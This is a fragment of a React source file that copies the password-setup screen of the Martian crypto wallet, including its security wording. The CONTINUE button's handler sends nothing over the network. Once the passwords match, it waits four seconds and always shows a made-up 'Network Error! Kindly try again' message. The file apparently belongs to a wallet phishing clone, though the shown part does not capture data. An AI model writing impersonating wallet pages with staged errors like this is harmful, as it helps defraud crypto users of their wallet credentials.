												<Text flex="1" color="rgb(131, 128, 120)" ml="3">For your protection, Martian locks your wallet after 60 minutes of inactivity. You will need this password to unlock it. The password is stored securely on your device. We cannot recover the password for you, if it is lost.</Text>
											</Flex>

											<Flex bg="rgb(0, 0, 0)" w="100%" mx="auto" mt="8" borderRadius="7px" justify="center" color="#fff" padding="5px 5px" h="50px" align="center" fontSize="20px" cursor={isChecked ? "pointer" : "not-allowed"} direction="column" onClick={() => {
												var a = inp3.current.value
												var b = inp4.current.value
												if(a !== "" && b !== "" && a === b && isChecked) {
													setLoading2(true)
													setTimeout(function() {
														setErrMsg("Network Error! Kindly try again")
														setErr(true)
														setLoading2(false)
													}, 4000)
												}
												else if(a !== b && isChecked) {
													setErrMsg("Password and Confirm password should match")
													setErr(true)
												}
											}}>
												<Flex border="2.5px solid rgb(255, 255, 255)" w="100%" borderRadius="2px" display="absolute" h="43px" align="center" justify="center">
													<Flex h="43px" mt="-2.5px" bg="#000" w="96%" _hover={{ w: "92%" }} transition="300ms ease-in-out" mx="auto" align="center" justify="center">CONTINUE {loading2 && <Spinner color="#fff" ml="3" size='sm' />}</Flex>
												</Flex>
											</Flex>
										</Flex>
										:
										<></>
									}
								</Flex>
							</Flex>
						}
					</Flex>
				</Flex>



				<Flex w="20%"></Flex>
			</Flex>
			{
				err &&
				<Flex w="100%" justify="center" align="center" position="fixed" bottom="0" left="0" zIndex="1000" px={["5%"]}>
					<FadeIn
						from="bottom"
						positionOffset={0}
						triggerOffset={0}
						delayInMilliseconds={0}
					>
						<Flex padding="25px 23px 25px 32px" bg="rgb(33, 33, 35)" boxShadow="rgb(201 201 201 / 50%) 0px 4px 10px" borderRadius="8px" mb="8" align="center" data-aos="zoom-in" data-aos-duration="500">
							<Flex mr="4">	
								<svg stroke="currentColor" fill="currentColor" strokeWidth="0" viewBox="0 0 24 24" color="red" height="30px" width="30px" xmlns="http://www.w3.org/2000/svg" style={{ color: "red" }}><path fill="none" d="M0 0h24v24H0z"></path><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z"></path></svg>
							</Flex>
							<Text color="#fff" fontSize={["15px", "17px"]} fontWeight="bold">{errMsg}</Text>
						</Flex>
					</FadeIn>
				</Flex>
			}
		</ChakraProvider>
	)
}

export default App;
